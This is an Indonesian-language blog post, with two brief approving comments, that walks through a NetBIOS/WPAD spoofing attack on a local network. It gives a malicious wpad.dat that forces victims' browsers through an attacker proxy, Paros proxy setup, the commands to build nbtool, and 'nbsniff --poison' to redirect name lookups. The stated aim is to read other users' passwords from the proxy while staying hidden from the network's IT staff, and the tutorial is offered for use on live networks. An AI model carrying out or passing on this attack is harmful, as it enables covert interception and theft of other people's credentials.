netbios-spoofing
nb: tekhnik berlaku hanya untuk yang konfigurasiin Browser, Lan Settings nya kayak gini
spoof pake netbios lebih enak coz? ya enggak pake ARP, lagian lebih quiet, kalo pake ARP nanti gw di aduin sama anak IT-GOS ke sini lah ke situ lah, dasar anak anak idiot
pada saat DNS tidak dapat diresolve oleh windows, maka windows bakal melakukan yang namanya WPAD (Web Proxy Auto Directory) yang dimana windows bakal mencari WPAD pada netbios gateway di dalam jaringan,
Ron, menemukan kelemahan pada saat saat dimana WPAD direquest otomatis oleh windows yang biasanya ini terjadi di tempat hotspot atau bla bla..
start apache server dan set up wpad.dat
root@bt:~# /etc/init.d/apache2 restart root@bt:~# nano /var/www/wpad.dat
isi wpad.dat
function FindProxyForURL(url, host)
{
return "PROXY 192.168.1.254:8080";
}
set up paros (bt4-final)
root@bt:~# ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:1e:68:2e:73:4a
inet addr:192.168.1.254 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::21e:68ff:fe2e:734a/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:16301 errors:0 dropped:0 overruns:0 frame:0
TX packets:21978 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:13599206 (13.5 MB) TX bytes:13336619 (13.3 MB)
Interrupt:27 Base address:0xa000
set up (options) local proxy dengan ip 192.168.1.254 listening di 8080
download dan install nbtool
root@bt:~# svn co http://svn.skullsecurity.org:81/ron/security/nbtool root@bt:~# cd nbtool/ root@bt:~/nbtool# make root@bt:~/nbtool# make install
mulai poison
root@bt:~# nbsniff --poison -s 192.168.1.254
cek password user di paros
mari dukung gerakan Anti-ASSLAB.
ref: http://www.skullsecurity.org/blog/
March 9th, 2010 at 9:52 am
kut nyimak aja ..hahah :D
July 2nd, 2010 at 5:22 pm
keren bro….
perbanyak lagi pencerahan yg spt ini, salute….